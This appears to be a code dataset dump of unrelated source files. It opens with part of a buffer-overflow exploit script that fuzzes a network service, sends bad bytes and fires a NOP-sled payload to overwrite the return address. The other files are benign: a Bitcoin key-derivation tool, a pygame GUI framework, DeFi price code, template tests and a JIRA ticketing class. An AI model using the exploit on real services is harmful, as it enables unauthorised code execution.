# bad bytes: \x00\x0a\x0d
nop = b"\x90" * 30
payload = b"A"*251 + ret + nop + buf
def main():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((host, port))
print("Sending Payload!")
s.send(payload + b"\r\n")
except:
print("Yeh done goofed, i cant connect yeh pesky bastard!")
def lookup(value):
# the eip will be in little endianess, so least significant byte first
# this means that pwntools will not manually unhex/change endianess for you
# cyclic_find will only search for ascii values, anything other than that it will complain
print(cyclic_find(unhex(value)[::-1]))
def fuzz():
print("Fuzzing!")
buffer = []
counter = 100
while len(buffer) < 30:
buffer.append("A"*counter)
counter += 100
for string in buffer:
try:
p = cyclic(len(string))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((host, port))
s.recv(1024)
print("Sending %s Bytes!" % len(p))
print("Payload: \n%s" % p)
s.send(p + b"\r\n")
s.recv(1024)
s.close()
time.sleep(0.5)
except socket.error:
print("Could not connect to: %s:%s" % (host, port))
sys.exit(0)
def badsend():
bad = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\
\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\
\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\
\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\
\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\
\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\
\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\
\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\
\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\
\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\
\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\
\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\
\xfb\xfc\xfd\xfe\xff"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(bad)
s.close()
try:
if len(sys.argv) > 1 and sys.argv[1] == "-b":
print("Sending bad bytes!!!")
badsend()
elif sys.argv[1] == "-f":
fuzz()
elif sys.argv[1] == "-a":
main()
elif sys.argv[1] == "-l":
lookup(sys.argv[2])
except IndexError:
print("Usage: python %s [-f] [-b] [-a] [-l]" % sys.argv[0])
print("-f\tFuzz the target!\n-b\tThrow a shit ton of bad bytes!!\n-a\tBombz Away!..")
print("-l\tLookup offset of overwritten return address (Example: -l 61616E63)")
``` |
{
"source": "0xMars/btc-address-dump",
"score": 3
} |
#### File: btc-address-dump/btc_address_dump/btc_address_dump.py
```python
import os
import sys
import re
import binascii
file_path = os.path.abspath(os.path.join(os.path.dirname(__file__)))
sys.path.insert(0, os.path.abspath(file_path))
import mnemonic_util
import wif_util
import p2pkh_util
import p2wpkh_util
import common_util
def main_entry(argv):
mnemonic = ''
private_key = ''
private_key_wif = ''
private_key_wif_compressed = ''
public_key_uncompressed = ''
public_key_compressed = ''
addr_p2pkh_uncompressed = ''
addr_p2pkh_compressed = ''
addr_p2wpkh = ''
if len(argv) == 1:
sys.stderr.write("usage: {0} [mnemonic-words|private-key|public-key]\n".format(argv[0]))
sys.exit(1)
addresses = argv[1:]
for address_input in addresses:
if re.search("^([a-zA-Z]+\\s){11}([a-zA-Z]+).*$", address_input):
# 12 mnemonic words
# For example: olympic wine chicken argue unaware bundle tunnel grid spider slot spell need
sys.stderr.write("you input mnemonic\n")
mnemonic = address_input
private_key = mnemonic_util.mnemonic_to_private_key(mnemonic)
private_key_wif = wif_util.gen_wif_key(private_key)
private_key_wif_compressed = wif_util.gen_wif_key(private_key, compressed_WIF=True)
public_key_uncompressed = common_util.prikey_to_pubkey(private_key, compressed_pubkey=False)
public_key_compressed = common_util.pubkey_uncompressed_to_compressed(public_key_uncompressed)
addr_p2pkh_uncompressed = p2pkh_util.pubkey_to_addr(public_key_uncompressed)
addr_p2pkh_compressed = p2pkh_util.pubkey_to_addr(public_key_compressed)
addr_p2wpkh = p2wpkh_util.pubkey_to_segwit_addr(public_key_compressed)
elif (len(address_input) == 66 and address_input.startswith("0x")) or len(address_input) == 64:
sys.stderr.write("you input private key\n")
# private key
# For example: 0xc7ac679b56f50bfd54dd924fe45a8dca7a1c2dced254b03dac22afc03adb9127
# For example: c7ac679b56f50bfd54dd924fe45a8dca7a1c2dced254b03dac22afc03adb9127
private_key_hex = address_input.lower().replace('0x', '')
private_key = binascii.unhexlify(private_key_hex)
private_key_wif = wif_util.gen_wif_key(private_key)
private_key_wif_compressed = wif_util.gen_wif_key(private_key, compressed_WIF=True)
public_key_uncompressed = common_util.prikey_to_pubkey(private_key, compressed_pubkey=False)
public_key_compressed = common_util.pubkey_uncompressed_to_compressed(public_key_uncompressed)
addr_p2pkh_uncompressed = p2pkh_util.pubkey_to_addr(public_key_uncompressed)
addr_p2pkh_compressed = p2pkh_util.pubkey_to_addr(public_key_compressed)
addr_p2wpkh = p2wpkh_util.pubkey_to_segwit_addr(public_key_compressed)
elif (len(address_input) == 130 and address_input.startswith("0x")) or len(address_input) == 128 \
or (len(address_input) == 132 and address_input.startswith("0x04")) \
or (len(address_input) == 130 and address_input.startswith("04")):
sys.stderr.write("you input uncompressed public key\n")
# public key
# For example: <KEY>
# For example: <KEY>
# For example: 0x044cd0aaeca3b636078583408e75edd77307b5190ca7a48bb9fbc1f2576c17dff1087190d91e26af594e3f8ecd3f4d3596c03c45d3b235da916903c930c6593cc4
# For example: <KEY>
public_key_hex = address_input[-128:] # keep last 128 (remove leading 0x04, 0x, 04)
public_key_uncompressed = b'\04' + binascii.unhexlify(public_key_hex)
public_key_compressed = common_util.pubkey_uncompressed_to_compressed(public_key_uncompressed)
addr_p2pkh_uncompressed = p2pkh_util.pubkey_to_addr(public_key_uncompressed)
addr_p2pkh_compressed = p2pkh_util.pubkey_to_addr(public_key_compressed)
addr_p2wpkh = p2wpkh_util.pubkey_to_segwit_addr(public_key_compressed)
elif (len(address_input) == 68 and address_input.startswith("0x")) or len(address_input) == 66:
sys.stderr.write("you input compressed public key\n")
# compressed public key
# For example: <KEY>
# For example: <KEY>
public_key_compressed_hexstr = address_input.lower().replace('0x', '')
public_key_compressed = binascii.unhexlify(public_key_compressed_hexstr)
public_key_uncompressed = common_util.pubkey_compressed_to_uncompressed(public_key_compressed)
addr_p2pkh_uncompressed = p2pkh_util.pubkey_to_addr(public_key_uncompressed)
addr_p2pkh_compressed = p2pkh_util.pubkey_to_addr(public_key_compressed)
addr_p2wpkh = p2wpkh_util.pubkey_to_segwit_addr(public_key_compressed)
elif address_input.startswith("5") or address_input.startswith("K") or address_input.startswith("L"):
private_key = wif_util.decode_wif(address_input)
private_key_wif = wif_util.gen_wif_key(private_key)
private_key_wif_compressed = wif_util.gen_wif_key(private_key, compressed_WIF=True)
public_key_uncompressed = common_util.prikey_to_pubkey(private_key, compressed_pubkey=False)
public_key_compressed = common_util.pubkey_uncompressed_to_compressed(public_key_uncompressed)
addr_p2pkh_uncompressed = p2pkh_util.pubkey_to_addr(public_key_uncompressed)
addr_p2pkh_compressed = p2pkh_util.pubkey_to_addr(public_key_compressed)
addr_p2wpkh = p2wpkh_util.pubkey_to_segwit_addr(public_key_compressed)
else:
sys.stderr.write("invalid input: {0}\n".format(address_input))
sys.exit(1)
if mnemonic:
print("mnemonic = {}".format(mnemonic))
if private_key:
print("private key (hex) = {}".format(str(binascii.hexlify(private_key), 'ascii')))
if private_key_wif:
print("private key (WIF) = {}".format(str(private_key_wif, 'ascii')))
if private_key_wif_compressed:
print("private key (WIF compressed) = {}".format(str(private_key_wif_compressed, 'ascii')))
if public_key_uncompressed:
print("public key (uncompressed) = {}".format(str(binascii.hexlify(public_key_uncompressed), 'ascii')))
if public_key_compressed:
print("public key (compressed) = {}".format(str(binascii.hexlify(public_key_compressed), 'ascii')))
if addr_p2pkh_uncompressed:
print("address (p2pkh uncompressed) = {}".format(str(addr_p2pkh_uncompressed, 'ascii')))
if addr_p2pkh_compressed:
print("address (p2pkh compressed) = {}".format(str(addr_p2pkh_compressed, 'ascii')))
if addr_p2wpkh:
print("address (p2wpkh) = {}".format(addr_p2wpkh))
if __name__ == '__main__':
main_entry(sys.argv)
```
#### File: btc-address-dump/btc_address_dump/common_util.py
```python
import ecdsa
from ecdsa.ellipticcurve import PointJacobi
def pubkey_compressed_to_uncompressed(compressed_pubkey: bytes) -> bytes:
# modulo p which is defined by secp256k1's spec
p = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
x = int.from_bytes(compressed_pubkey[1:33], byteorder='big')
y_sq = (pow(x, 3, p) + 7) % p
y = pow(y_sq, (p + 1) // 4, p)
if compressed_pubkey[0] % 2 != y % 2:
y = p - y
y = y.to_bytes(32, byteorder='big')
return b'\04' + compressed_pubkey[1:33] + y # x + y
def pubkey_uncompressed_to_compressed(uncompressed_pubkey: bytes) -> bytes:
# Compressed public key is:
# 0x02 + x - coordinate if y is even
# 0x03 + x - coordinate if y is odd
x = int.from_bytes(uncompressed_pubkey[1:33], byteorder='big') # uncompressed_pubkey must contain prefix b'\04'
y = int.from_bytes(uncompressed_pubkey[33:65], byteorder='big')
parity = y & 1
compressed_public_key = (2 + parity).to_bytes(1, byteorder='big') + x.to_bytes(32, byteorder='big')
return compressed_public_key
def pubkey_from_bytes_to_point(pubkey: bytes) -> tuple[int, int]:
assert len(pubkey) == 33 or len(pubkey) == 65
if len(pubkey) == 33: # compressed pubkey
uncompressed_pubkey = pubkey_compressed_to_uncompressed(pubkey)
else:
uncompressed_pubkey = pubkey
x = int.from_bytes(uncompressed_pubkey[1:33], byteorder='big') # uncompressed_pubkey must contain prefix b'\04'
y = int.from_bytes(uncompressed_pubkey[33:65], byteorder='big')
return x, y
def pubkey_from_point_to_bytes(x: int, y: int, compressed: bool = True) -> bytes:
xstr = x.to_bytes(32, byteorder='big')
ystr = y.to_bytes(32, byteorder='big')
if compressed:
parity = y & 1
return (2 + parity).to_bytes(1, byteorder='big') + xstr
else:
return b'\04' + xstr + ystr
def prikey_to_pubkey(private_key: bytes, compressed_pubkey: bool = True) -> bytes:
Q: PointJacobi = int.from_bytes(private_key, byteorder='big') * ecdsa.curves.SECP256k1.generator
return pubkey_from_point_to_bytes(Q.x(), Q.y(), compressed_pubkey)
```
#### File: btc-address-dump/btc_address_dump/wif_util.py
```python
import binascii
import hashlib
import base58
from typing import Union
def scrub_input(hex_str_or_bytes: Union[str, bytes]) -> bytes:
if isinstance(hex_str_or_bytes, str):
hex_str_or_bytes = binascii.unhexlify(hex_str_or_bytes)
return hex_str_or_bytes
# wallet import format key - base58 encoded format
# https://bitcoin.stackexchange.com/questions/9244/private-key-to-wif
def gen_wif_key(private_key: Union[str, bytes], compressed_WIF: bool = False) -> bytes:
private_key = scrub_input(private_key)
# prepended mainnet version byte to private key
mainnet_private_key = b'\x80' + private_key
if compressed_WIF:
mainnet_private_key = b'\x80' + private_key + b'\x01'
# mainnet_private_key = decode_hex('800c28fca386c7a227600b2fe50b7cae11ec86d3bf1fbe471be89827e19d72aa1d')
# perform SHA-256 hash on the mainnet_private_key
sha256 = hashlib.sha256()
sha256.update(mainnet_private_key)
hash_bytes = sha256.digest()
# perform SHA-256 on the previous SHA-256 hash
sha256 = hashlib.sha256()
sha256.update(hash_bytes)
hash_bytes = sha256.digest()
# create a checksum using the first 4 bytes of the previous SHA-256 hash
# append the 4 checksum bytes to the mainnet_private_key
checksum = hash_bytes[:4]
# print('checksum', binascii.hexlify(checksum))
hash_bytes = mainnet_private_key + checksum
# print('hash', binascii.hexlify(hash))
# convert mainnet_private_key + checksum into base58 encoded string
return base58.b58encode(hash_bytes)
def decode_wif(wif: str) -> bytes:
compressed = False
if wif.startswith('K') or wif.startswith('L'):
compressed = True
decoded = base58.b58decode(wif)
if compressed:
private_key = decoded[1:-5] # [80 xxx 1 checksum]
else:
private_key = decoded[1:-4] # [80 xxx checksum]
return private_key
``` |
{
"source": "0xMartin/SimpleApp-Pygame-framework",
"score": 3
} |
#### File: SimpleApp-Pygame-framework/SimpleApp/colors.py
```python
BLACK = (0, 0, 0)
GRAY = (127, 127, 127)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
YELLOW = (255, 255, 0)
CYAN = (0, 255, 255)
MAGENTA = (255, 0, 255)
def colorChange(color: tuple, amount: float) -> tuple:
"""
Change color lightness
Parameters:
color -> default color
amount -> from -2(darker) o 2(lighter)
"""
rgb = list(color)
amount = 1.0 + amount / 2.0
rgb[0] *= amount
rgb[1] *= amount
rgb[2] *= amount
rgb[0] = max(min(rgb[0], 255), 0)
rgb[1] = max(min(rgb[1], 255), 0)
rgb[2] = max(min(rgb[2], 255), 0)
return tuple(rgb)
def colorAdd(color: tuple, amount: int) -> tuple:
"""
Add number to color
Parameters:
color -> default color
amount ->
"""
rgb = list(color)
rgb[0] += amount
rgb[0] = max(min(rgb[0], 255), 0)
rgb[1] += amount
rgb[1] = max(min(rgb[1], 255), 0)
rgb[2] += amount
rgb[2] = max(min(rgb[2], 255), 0)
return tuple(rgb)
def colorInvert(color: tuple) -> tuple:
"""
Invert color
Parameters:
color -> default color
"""
rgb = list(color)
rgb[0] = 255 - rgb[0]
rgb[1] = 255 - rgb[1]
rgb[2] = 255 - rgb[2]
return tuple(rgb)
def createColor(red: int, green: int, blue: int) -> tuple:
"""
Create color
Parameters:
red -> 0-255
green -> 0-255
blue -> 0-255
"""
return tuple(
max(min(red, 255), 0),
max(min(green, 255), 0),
max(min(blue, 255), 0)
)
```
#### File: SimpleApp/gui/checkbox.py
```python
import pygame
from ..utils import *
from ..colors import *
from ..guielement import *
from SimpleApp.gui.label import Label
class CheckBox(GUIElement):
def __init__(self, view, style: dict, text: str, checked: bool, size: int = 20, x: int = 0, y: int = 0):
"""
Create CheckBox element
Parameters:
view -> View where is element
style -> More about style for this element in config/styles.json
text -> Text of TextInput
checked -> Is checked?
width -> Width of CheckBox
height -> Height of CheckBox
x -> X position
y -> Y position
"""
super().__init__(view, x, y, size, size, style)
self.label = Label(view, super().getStyle()[
"label"], text, False, True, x, y)
self.checked = checked
self.callback = None
def setText(self, text: str):
"""
Set text of label
Parameters:
text -> New text
"""
if self.label is not None:
self.label.setText(text)
def getLabel(self) -> Label:
"""
Get label
"""
return self.label
def setCheckedEvt(self, callback):
"""
Set checkbox Checked event
Parameters:
callback -> callback function
"""
self.callback = callback
def setChecked(self, checked: bool):
"""
Set checked state of this check box
Parameters:
checked -> True = Is checked
"""
self.checked = checked
def isChecked(self) -> Label:
"""
Return if this check box is checked
"""
return self.checked
@overrides(GUIElement)
def draw(self, view, screen):
# lable
if self.label is not None:
self.label.setX(super().getX() + super().getWidth() + 5)
self.label.setY(super().getY() + super().getHeight() / 2)
self.label.draw(view, screen)
# check box
if super().isSelected():
c = super().getStyle()["background_color"]
pygame.draw.rect(screen, colorChange(
c, -0.2 if c[0] > 128 else 0.6), super().getViewRect(), border_radius=6)
else:
pygame.draw.rect(screen, super().getStyle()[
"background_color"], super().getViewRect(), border_radius=5)
pygame.draw.rect(screen, super().getStyle()[
"outline_color"], super().getViewRect(), 2, border_radius=5)
# check
if self.checked:
pts = [
(super().getX() + super().getWidth() * 0.2,
super().getY() + super().getWidth() * 0.5),
(super().getX() + super().getWidth() * 0.4,
super().getY() + super().getWidth() * 0.75),
(super().getX() + super().getWidth() * 0.8,
super().getY() + super().getWidth() * 0.2)
]
pygame.draw.lines(screen, super().getStyle()
["foreground_color"], False, pts, round(7 * super().getWidth() / 40))
@overrides(GUIElement)
def processEvent(self, view, event):
if event.type == pygame.MOUSEBUTTONDOWN:
if inRect(event.pos[0], event.pos[1], super().getViewRect()):
if self.callback is not None:
self.callback(self)
self.checked = not self.checked
elif event.type == pygame.MOUSEMOTION:
if inRect(event.pos[0], event.pos[1], super().getViewRect()):
super().select()
else:
super().unSelect()
@overrides(GUIElement)
def update(self, view):
pass
```
#### File: SimpleApp/gui/image.py
```python
import pygame
from ..utils import *
from ..colors import *
from ..guielement import *
class Image(GUIElement):
def __init__(self, view, image_path: str, width: int = 0, height: int = 0, x: int = 0, y: int = 0):
"""
Create Image element
Parameters:
view -> View where is element
image_path -> Image path
width -> Width of Image
height -> Height of Image
x -> X position
y -> Y position
"""
super().__init__(view, x, y, width, height, None)
self.image = loadImage(image_path)
def setImage(self, image_path: str):
"""
Set new image
Parameters:
image_path -> Image path
"""
self.image = loadImage(image_path)
def getImage(self) -> pygame.Surface:
"""
Get image
"""
return self.image
@overrides(GUIElement)
def draw(self, view, screen):
if self.image is not None:
screen.blit(pygame.transform.scale(self.image, (super().getWidth(
), super().getHeight())), (super().getX(), super().getY()))
@overrides(GUIElement)
def processEvent(self, view, event):
pass
@overrides(GUIElement)
def update(self, view):
pass
```
#### File: SimpleApp-Pygame-framework/SimpleApp/stylemanager.py
```python
from .utils import *
class StyleManager:
"""
Provides style for each GUI element. Loading and preserves all application styles.
"""
def __init__(self, styles_path):
"""
Create style manager
Parameters:
styles_path -> Path where is file with styles for all guil elements
"""
self.styles_path = styles_path
def init(self):
"""
Init style manager
"""
self.loadStyleSheet(self.styles_path)
def loadStyleSheet(self, styles_path):
"""
Load stylesheet from file
Parameters:
styles_path -> Path where is file with styles for all guil elements
"""
self.styles = loadConfig(styles_path)
def getStyleWithName(self, name) -> dict:
"""
Get style with specific name from stylsheet
Parameters:
name -> Name of style
"""
if name not in self.styles.keys():
return None
else:
return self.processStyle(self.styles[name])
def processStyle(self, style) -> dict:
"""
Some string values are replaced by an object if necessary
Parameters:
style -> Some style
"""
# colors
new_style = style.copy()
for tag in new_style.keys():
if "color" in tag:
rgb = new_style[tag].split(",")
new_style[tag] = tuple([int(rgb[0]), int(rgb[1]), int(rgb[2])])
elif isinstance(new_style[tag], dict):
new_style[tag] = self.processStyle(new_style[tag])
return new_style
``` |
{
"source": "0xMayflower/yearn-exporter",
"score": 2
} |
#### File: yearn-exporter/yearn/ironbank.py
```python
from collections import defaultdict
from dataclasses import dataclass
from brownie import Contract
from brownie.network.contract import InterfaceContainer
from joblib import Parallel, delayed
from yearn.utils import contract_creation_block
from yearn.multicall2 import multicall_matrix
from yearn.prices import magic
@dataclass
class IronbankMarket:
name: str
vault: InterfaceContainer
token_name: str
underlying: InterfaceContainer
cdecimals: int
decimals: int
@property
def token(self):
return self.underlying
class Registry:
def __init__(self):
ironbank = Contract("0xAB1c342C7bf5Ec5F02ADEA1c2270670bCa144CbB")
markets = [Contract(market) for market in ironbank.getAllMarkets()]
cdata = multicall_matrix(markets, ["symbol", "underlying", "decimals"])
underlying = [Contract(cdata[x]["underlying"]) for x in markets]
data = multicall_matrix(underlying, ["symbol", "decimals"])
self.vaults = [
IronbankMarket(
cdata[market]["symbol"],
market,
data[token]["symbol"],
token,
cdata[market]["decimals"],
data[token]["decimals"],
)
for market, token in zip(markets, underlying)
]
def __repr__(self):
return f"<IronBank markets={len(self.vaults)}>"
def describe(self, block=None):
markets = self.active_vaults_at(block)
blocks_per_year = 365 * 86400 / 15
contracts = [m.vault for m in markets]
results = multicall_matrix(
contracts,
[
"exchangeRateCurrent",
"getCash",
"totalBorrows",
"totalSupply",
"totalReserves",
"supplyRatePerBlock",
"borrowRatePerBlock",
],
block=block,
)
prices = Parallel(8, "threading")(
delayed(magic.get_price)(market.underlying, block=block) for market in markets
)
output = defaultdict(dict)
for m, price in zip(markets, prices):
res = results[m.vault]
exchange_rate = res["exchangeRateCurrent"] * 10 ** (m.cdecimals - m.decimals - 18)
for attr in ["getCash", "totalBorrows", "totalReserves"]:
res[attr] /= 10 ** m.decimals
tvl = (res["getCash"] + res["totalBorrows"] - res["totalReserves"]) * price
supplied = res["getCash"] + res["totalBorrows"] - res["totalReserves"]
ratio = res["totalBorrows"] / supplied if supplied != 0 else None
output[m.name] = {
"total supply": res["totalSupply"] / 10 ** m.cdecimals,
"total cash": res["getCash"],
"total supplied": supplied,
"total borrows": res["totalBorrows"],
"total reserves": res["totalReserves"],
"exchange rate": exchange_rate,
"token price": price * exchange_rate,
"underlying price": price,
"supply apy": res["supplyRatePerBlock"] / 1e18 * blocks_per_year,
"borrow apy": res["borrowRatePerBlock"] / 1e18 * blocks_per_year,
"utilization": ratio,
"tvl": tvl,
"address": m.vault,
"version": "ib",
}
return dict(output)
def total_value_at(self, block=None):
markets = self.active_vaults_at(block)
data = multicall_matrix(
[market.vault for market in markets],
["getCash", "totalBorrows", "totalReserves", "totalSupply"],
block=block,
)
prices = Parallel(8, "threading")(delayed(magic.get_price)(market.vault, block=block) for market in markets)
results = [data[market.vault] for market in markets]
return {
# market.name: (res["getCash"] + res["totalBorrows"] - res["totalReserves"]) / 10 ** market.decimals * price
market.name: res["totalSupply"] / 10 ** market.cdecimals * price
for market, price, res in zip(markets, prices, results)
}
def active_vaults_at(self, block=None):
if block is None:
return self.vaults
return [market for market in self.vaults if contract_creation_block(str(market.vault)) < block]
```
#### File: yearn/prices/balancer.py
```python
from brownie import Contract
from cachetools.func import ttl_cache
from yearn.cache import memory
from yearn.multicall2 import fetch_multicall
from yearn.prices import magic
@memory.cache()
def is_balancer_pool(address):
pool = Contract(address)
required = {"getCurrentTokens", "getBalance", "totalSupply"}
if set(pool.__dict__) & required == required:
return True
return False
@ttl_cache(ttl=600)
def get_price(token, block=None):
pool = Contract(token)
tokens, supply = fetch_multicall([pool, "getCurrentTokens"], [pool, "totalSupply"], block=block)
supply = supply / 1e18
balances = fetch_multicall(*[[pool, "getBalance", token] for token in tokens], block=block)
balances = [balance / 10 ** Contract(token).decimals() for balance, token in zip(balances, tokens)]
total = sum(balance * magic.get_price(token, block=block) for balance, token in zip(balances, tokens))
return total / supply
``` |
{
"source": "0xmc/hackathon81_configmodel",
"score": 3
} |
#### File: templates/eos/test_bgppeer.py
```python
import unittest
from configmodel.templates.render import render
class TestBGPPeer(unittest.TestCase):
"""BGP peer unit tests."""
def test_pass_a(self):
"""Local AS only."""
config = {"local_asn": 666}
actual = render("eos", "bgppeer", config)
expected = """router bgp 666
"""
assert actual == expected
def test_pass_b(self):
"""Good ipv4 only."""
config = {"local_asn": "666", "peer_asn": "666", "peer_v4": "192.0.2.1"}
actual = render("eos", "bgppeer", config)
expected = """router bgp 666
neighbor 192.0.2.1 remote-as 666
"""
assert actual == expected
def test_pass_c(self):
"""Good ipv4 and ipv6."""
config = {
"local_asn": "666",
"peer_asn": "666",
"peer_v4": "192.0.2.1",
"peer_v6": "2001:db8:c057:e110::1",
}
actual = render("eos", "bgppeer", config)
expected = """router bgp 666
neighbor 192.0.2.1 remote-as 666
neighbor 2001:db8:c057:e110::1 remote-as 666
"""
assert actual == expected
```
#### File: templates/junos/test_bgppeer.py
```python
import unittest
from configmodel.templates.render import render
class TestBGPPeer(unittest.TestCase):
"""BGP peer unit tests."""
def test_pass_a_internal(self):
"""Internal AS only."""
config = {"local_asn": 666, "peer_asn": 666}
actual = render("junos", "bgppeer", config)
expected = """autonomous-system 666;
bgp {
group internal-peers {
type internal;
}
}
"""
assert actual == expected
def test_pass_a_external(self):
"""External AS only."""
config = {"local_asn": 666, "peer_asn": 1337}
actual = render("junos", "bgppeer", config)
expected = """autonomous-system 666;
bgp {
group external-peers {
type external;
peer-as 1337;
}
}
"""
assert actual == expected
def test_pass_b_internal_v4(self):
"""Internal and ipv4."""
config = {"local_asn": 666, "peer_asn": 666, "peer_v4": "192.0.2.1"}
actual = render("junos", "bgppeer", config)
expected = """autonomous-system 666;
bgp {
group internal-peers {
type internal;
neighbor 192.0.2.1;
}
}
"""
assert actual == expected
def test_pass_c_internal_v4_v6(self):
"""Internal and ipv4 and ipv6."""
config = {
"local_asn": 666,
"peer_asn": 666,
"peer_v4": "192.0.2.1",
"peer_v6": "2001:db8:c057:e110::1",
}
actual = render("junos", "bgppeer", config)
expected = """autonomous-system 666;
bgp {
group internal-peers {
type internal;
neighbor 192.0.2.1;
neighbor 2001:db8:c057:e110::1;
}
}
"""
assert actual == expected
def test_pass_d_external_v4_v6(self):
"""External and ipv4 and ipv6."""
config = {
"local_asn": 666,
"peer_asn": 1337,
"peer_v4": "192.0.2.1",
"peer_v6": "2001:db8:c057:e110::1",
}
actual = render("junos", "bgppeer", config)
expected = """autonomous-system 666;
bgp {
group external-peers {
type external;
peer-as 1337;
neighbor 192.0.2.1;
neighbor 2001:db8:c057:e110::1;
}
}
"""
assert actual == expected
``` |
{
"source": "0xmc/maint-notification",
"score": 3
} |
#### File: maint-notification/xmaintnote/ticketing.py
```python
from textwrap import dedent
from jira import JIRA
class Ticket(object):
"""Base class for a ticket
Purpose of this is to provide standard methods for retrieving duplicates,
creating event, and deleting.
Implementation details should be self-contained to each subclass but not
really different from the interface perspective.
Attributes:
event (XMaintNoteEvent)
acconut (str)
impact (str)
maintenance_id (str)
object_id (str)
provider (str)
key (str): String that can try to be used to be unique among
maintenances
title (str): Generated title that may be used as a ticket title
body (str): Generated body thath may be used as a ticket description
ticket: Optional to add by subclass, instance of ticket in the ticket
system
"""
def __init__(self, event, **kwargs):
"""Initializes and runs _post_init()
Event is the only required input with any kwargs being accepted and
forworded to ``self._post_init``. Purpose of the ``_post_init`` method
is to facilitate each type of ticketing system to mutate the event data
in however it needs without overloading ``__init__`` itself.
A key is created using the provider, account, and maintenance-id keys
of the event. How this is implemented by a ticketing system to take
advantage of is up to the subclass.
Args:
event (XMaintNoteEvent): Maintenance Event
"""
self.event = event
self.account = event['X-MAINTNOTE-ACCOUNT']
self.impact = event['X-MAINTNOTE-IMPACT']
self.maintenance_id = event['X-MAINTNOTE-MAINTENANCE-ID']
self.object_id = event['X-MAINTNOTE-OBJECT-ID']
self.provider = event['X-MAINTNOTE-PROVIDER']
self.ticket = None
factors = [
self.provider,
self.account,
self.maintenance_id,
]
self.key = '{}:{}:{}'.format(*factors)
self.title = '{provider} {impact} Maintenance for {account}'.format(
provider=self.provider,
impact=self.impact,
account=self.account,
)
body = '''
{provider} is having a maintenance of {impact}. Affected account number
is {account}.
Start time: {start_time}
End time: {end_time}
Impact: {impact}
Account: {account}
'''.format(
provider=self.provider,
impact=self.impact,
account=self.account,
start_time=str(event['DTSTART'].dt),
end_time=str(event['DTEND'].dt),
)
self.body = dedent(body)
self._post_init(**kwargs)
def _post_init(self, **kwargs):
pass
def create(self):
"""Overload to create a ticket in the system"""
raise NotImplemented('Subclass must overload this method')
def close(self):
"""Overload to close a ticket in the system"""
raise NotImplemented('Subclass must overload this method')
def exists(self):
"""Overload to determine if this event exists in ticket form already"""
raise NotImplemented('Subclass must overload this method')
class JiraTicket(Ticket):
"""Ticket driver for JIRA
Supports adding list of watchers to maintenance issues created, custom
finishing transition for when calling close, and custom issue types.
Priorities will be mapped according to the impact status of the
maintenance. A preferred mapping can be provided otherwise it defaults to
using the Vanilla JIRA install names, eg:
>>> {
'NO-IMPACT': {'name': 'Low'},
'REDUCED-REDUNDANCY': {'name': 'Medium'},
'DEGRADED': {'name': 'High'},
'OUTAGE': {'name': 'Highest'},
}
Example:
>>> type(event)
xmaintnote.event.XMaintNoteEvent
>>> tkt = JiraTicket(
event,
url='http://localhost',
username='admin',
password='<PASSWORD>',
watchers='noc',
)
>>> tkt.exists()
False
>>> tkt.create()
True
>>> tkt.exists()
True
>>> tkt.ticket
<JIRA Issue: key=u'MAINT-14', id=u'10013'>
>>> tkt.impact
vText('NO-IMPACT')
>>> tkt.ticket.fields.priority
<JIRA Priority: name=u'Low', id=u'4'>
>>> tkt.ticket.fields.labels
[u'example.com:137.035999173:WorkOrder-31415']
"""
def _post_init(
self,
url='http://localhost:8080',
username=None,
password=<PASSWORD>,
project='MAINT',
issuetype='Task',
finished_transition='Done',
watchers=None,
pri_mapping=None,
):
"""Setup to initialize Jira client and any required settings
If username or password aren't provided, will attempt to do actions as
anonymous
Args:
url (str): URL to jira server. MUST have the URL scheme (http://)
username (str): Username (if applicable)
password (str): Password (if applicable)
project (str): JIRA project handle
issuetype (str): Issue type to file these issues as
watchers (list): List of usernames to add as watchers to the maints
finished_transition (str): Transition to move the issue into when
calling the ``.close`` method. Default: Done
pri_mapping (str): Map of maintenance impact name to JIRA priority
dict. eg, {'NO-IMPACT': {'name': 'Low'}}
"""
# If either part of the credential tuple is unprovided, default to
# anonymous
credentials = (username, password)
if not all(credentials):
basic_auth = None
else:
basic_auth = credentials
if not watchers:
watchers = []
if not pri_mapping:
pri_mapping = {
'NO-IMPACT': {'name': 'Low'},
'REDUCED-REDUNDANCY': {'name': 'Medium'},
'DEGRADED': {'name': 'High'},
'OUTAGE': {'name': 'Highest'},
}
self.jira = JIRA(url, basic_auth=basic_auth)
self.project = project
